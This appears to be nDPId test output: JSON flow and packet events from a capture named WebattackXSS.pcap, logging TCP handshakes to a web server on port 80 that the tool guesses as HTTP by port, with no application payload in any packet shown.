-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81Z1AAD4G8DKsEAABwKgKMuroAFDnlWqMAAAAAKACchBhXAAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6219,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ui8Jpzg55VqjaAScSB0yAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6220,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6uYE2QpnqY0gH6AScSBHCAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01Z5AAD4G8DmsEAABwKgKMuroAFDnlWqNvCac4YAQAOUTzwAAAQEICgE7vxID5ZCG"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nxBAAD4GJsisEAABwKgKMurmAFCpjSAfBNkKaIAQAOXmDgAAAQEICgE7vxID5ZCG"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347713588,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347713588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P+JAAD4Ghe6sEAABwKgKMur6AFB3+v+7AAAAAKACchA6bgAAAgQFtAQCCAoBO8BZAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":2,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6vp4zY2Qd\/r\/vKAScSCfOwAAAgQFtAQCCAoD5ZHOATvAWQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":3,"flow_last_seen":1499347713589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347713589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P+NAAD4GhfWsEAABwKgKMur6AFB3+v+8eM2NkYAQAOU+QwAAAQEICgE7wFkD5ZHO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347716243,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347716243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA821BAAD4G6n+sEAABwKgKMusUAFBsBhmhAAAAAKACchApywAAAgQFtAQCCAoBO8LxAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":2,"flow_last_seen":1499347716243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6xT1wuHkbAYZoqAScSC6tgAAAgQFtAQCCAoD5ZRmATvC8QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":3,"flow_last_seen":1499347716244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347716244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA021FAAD4G6oasEAABwKgKMusUAFBsBhmi9cLh5YAQAOVZvgAAAQEICgE7wvED5ZRm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347717533,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347717533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GKhAAD4GrSisEAABwKgKMusiAFDZTNycAAAAAKACchD4NwAAAgQFtAQCCAoBO8Q0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":2,"flow_last_seen":1499347717533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6yL+myOL2UzcnaAScSA9YgAAAgQFtAQCCAoD5ZWoATvENAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":3,"flow_last_seen":1499347717534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347717534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GKlAAD4GrS+sEAABwKgKMusiAFDZTNyd\/psjjIAQAOXcaQAAAQEICgE7xDQD5ZWo"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347720094,"flow_last_seen":1499347720094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1499347720094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qt5AAD4GGvKsEAABwKgKMus8AFAqiGxqAAAAAKACchAUlQAAAgQFtAQCCAoBO8a0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":2,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6zwJv9VKKohsa6AScSCaWwAAAgQFtAQCCAoD5ZgpATvGtAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":3,"flow_last_seen":1499347720095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347720095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qt9AAD4GGvmsEAABwKgKMus8AFAqiGxrCb\/VS4AQAOU5YwAAAQEICgE7xrQD5Zgp"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
